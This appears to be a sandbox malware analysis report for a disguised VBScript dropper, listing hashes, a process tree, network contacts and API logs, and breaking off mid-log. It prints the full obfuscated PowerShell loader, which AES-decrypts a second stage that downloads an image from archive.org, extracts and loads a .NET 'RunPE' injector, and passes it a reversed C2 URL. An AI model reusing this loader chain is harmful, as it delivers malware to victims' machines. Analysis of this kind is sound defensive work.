Summary | ZeroBOX

crosscheckrosefloweronhairbeauty.gIF.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 July 12, 2024, 3:58 p.m. July 12, 2024, 4 p.m.
Size 150.2KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 7921681c6200952fdf2db1a77381ac24
SHA256 06051fcdf49ca8dc96fecde6f1477cde2994a01f899ea063072e3c77789845fc
CRC32 D1E5D701
ssdeep 1536:yZccvQGghdpPZp+ogsUJW4Wrle/PhG+/kery+bGsvky38sv5HnIgs:QghdpP+og0S7e9
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\crosscheckrosefloweronhairbeauty.gIF.vbs

    3016
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53289677559390085198936330541601CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIfBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gqZ73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LInIlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGjetxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob44pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtucrwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWvIPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5TJh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5DtzNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77WJAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOTykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7wyvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cCc1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1HYdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhPQft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJKIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/EmKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8tkFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0IzlYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevGgVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJXCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

      1376

IP Address Status Action
164.124.101.2 Active Moloch
172.66.40.229 Active Moloch
207.241.232.195 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Method invocation failed because [System.Security.Cryptography.AesManaged] does
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: n't contain a method named 'Dispose'.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:715
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + function Decrypt-AESEncryption {Param([String]$Base64Text,[String]$Key)$aesMa
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: naged = New-Object System.Security.Cryptography.AesManaged;$aesManaged.Mode = [
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: System.Security.Cryptography.CipherMode]::CBC;$aesManaged.Padding = [System.Sec
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: urity.Cryptography.PaddingMode]::Zeros;$aesManaged.BlockSize = 128;$aesManaged.
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: KeySize = 256;$aesManaged.Key = (New-Object System.Security.Cryptography.SHA256
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key));$cipherBytes
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: = [System.Convert]::FromBase64String($Base64Text);$aesManaged.IV = $cipherBytes
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: [0..15];$decryptor = $aesManaged.CreateDecryptor();$decryptedBytes = $decryptor
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: .TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16);$aesManaged.Di
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: spose <<<< ();return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Tr
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: im([char]0);}$chave = "53289677559390085198936330541601";$textoCriptografadoBas
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: e64 = "fBvRZYArRiXxb9pLfOWJSzhLRPd5I7zACTsYJPbnDRxmpMjLudBMxIclsh5G1oAEB4NHw+gq
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: Z73NYAtRuPEZbun7w27uHNUU/2UZk0vwixZZjYF8SBUg7cmFK0nSMgU1Iow3bYmuii7NK55sdrSb83T
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: 7TlGZY91+Moz0ZBIk/0eAU2wf8Py5IgxbPrmhkNHTpbZFW/Al0eMV2MWxPeHSmQgZ//aQ5gn4Og/LIn
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: IlaSIqzqvxWq5kou0WIQo/72zG6+7hFvlR6cDOFO2EYak1CZ8irRCX18qAZvDaSJk/li/7cM0YyGDGj
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: etxHvddCjxoFrsIzOoFr80ro7ty8kqQMtvLfXWiRbyxHtkF3NxaNwlxDUG/Htly5mpzTXN98K6Fnob4
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: 4pHV6WFmrTRzBeXFvRMXFrkrC3t4BnQoCxsRB6x1sycYX2BAgD4vDPPYxPb47dSqUAoFV4NMTMVwtuc
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: rwLJdlZlPd2EnjstlapgPGyqeDuq+TKGWTRY7Z1C3vRcmlGe+lnY3QnpSNHNLl/haCmRsH4gMWyr4W/
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: C2zNKguYI0N/PuyhAYi7YLD4A/NHjUcCY9rhxCg197+PLu/OwLBOl0CXgp/Ts85zFpV7WYNvBVPdgWv
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: IPMkzBwQ+49ILJWVxcCDdE6JmR5Fq9tx9CQCnQJHN8uHPYaUlZ0ReVI/npl7GN05N9Obi18FtHe8U5T
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: Jh3++s3GfoiYW9BhKgh39janXG8zoXy6iZOVv1CDPHimFt85ZaMs1Bo+CmL5lnsudxNiDoq44/2E5Dt
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: zNoWEzZ+OQLsOM9Zh7Lke8w81xDJOSxVmqDoOcMa4I6/NsXFAlOTeKkhDmJCHTUB/Ks2qy+xvWMe77W
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: JAkO37XgYyBUTA46+w+NVfiXxSstunWVvAjPztuMG9ekqgyxG0tWnqnXcuN/TQwZP47Z83ALuTurZOT
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: ykuQEXA42lNWU8mibH2upcIACt8NoPw3r5fRNvJc322KLiLSEJOJDDwYQP3uPDW9ylYqnz9saWGUF7w
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: yvlEIrk5vKGo+vuncoCtLyjSFU2NNWq/OUhm3YFstmHb00qRls8jshNFDeskT+9HrCwRd5P+6kLq2cC
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: c1OCMU4SwDWZMZEi/L5oEW5wJXHXG/5VBwshKqSiAF1ojathm5reHGj8cBBQcmfmNAiBhE+cYjLiJ1H
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: YdwmhWRlD9k2l7IrpPf72Zqiu2AJE1o7WKFUPAGFRCXzrDrRaHWxr27DK2NG8lOEVbh92cuVyNGBlhP
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: Qft0FbKGvaWYwCm9BS9uJ8iakplRHRpzvLdk5Vw06NR0Yrav4GBiDdk6DqZecDjAKZoBxoCZOav+ztJ
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: KIbgKzOMNv18CX9tBGDWY/69/2jI7bvSx+CwNi/hpj3s9iK+SwzIrpD+dFAIiQcmP3Wj4TFZaBEjn++
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: UcwcO3C2sjME5q86SXNGxzQs3i74Hw5uxEiiJhjft+JA0nP2X91n118uUxgEZdNZYtfDuLLg3uLun/E
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: mKv1DFelh7eFXGEr3moW6nDkt16Q8Vt70kfULUet/WDc5XMsIOU0QFo5WQP9BPNJm7vuhbMBlWp/x8t
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: kFjKO9fCUtgZ3vYKrjvFe1RMsHOuSXcC8eZgwJNI3F0Gtx7Rc2jC2D+CDFPstFXOPDalI6g2hOKB0Iz
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: lYPk/GhbZmfoYqm2SfR4VcsG9fjYrUCGhbqag/5m5K5GGlkwdugJl/F/liXwGNmURs4EWFJe3UpAevG
console_handle: 0x000001c7
1 1 0

WriteConsoleW

buffer: gVLpYHIc48Xsqfyu4AfxXZtVkyJXoIc1AzQvH1cvQJm9XokY4SbLS7N7PiDJX";$textoDescriptog
console_handle: 0x000001d3
1 1 0

WriteConsoleW

buffer: rafado = Decrypt-AESEncryption -Base64Text $textoCriptografadoBase64 -Key $chav
console_handle: 0x000001df
1 1 0

WriteConsoleW

buffer: e;Write-Host "Texto Descriptografado: $textoDescriptografado";Invoke-Expression
console_handle: 0x000001eb
1 1 0

WriteConsoleW

buffer: $textoDescriptografado;
console_handle: 0x000001f7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (Dispose:String) [], RuntimeEx
console_handle: 0x00000203
1 1 0

WriteConsoleW

buffer: ception
console_handle: 0x0000020f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : MethodNotFound
console_handle: 0x0000021b
1 1 0

WriteConsoleW

buffer: Texto Descriptografado: function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg', 'https://ia803405.us.archive.org/16/items/new_image_202406/new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CBGR/66055/222.022.99.931//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }
console_handle: 0x00000237
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4320
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4060
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4060
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4060
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b4120
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3820
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3a20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005b3a20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET https://pastecode.dev/raw/6l7qjjrz/paste1.txt
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02730000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x739e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x739e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02642000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02731000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02643000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02644000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02677000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02645000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02646000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1376
region_size: 4096
stack_dep_bypass: 0
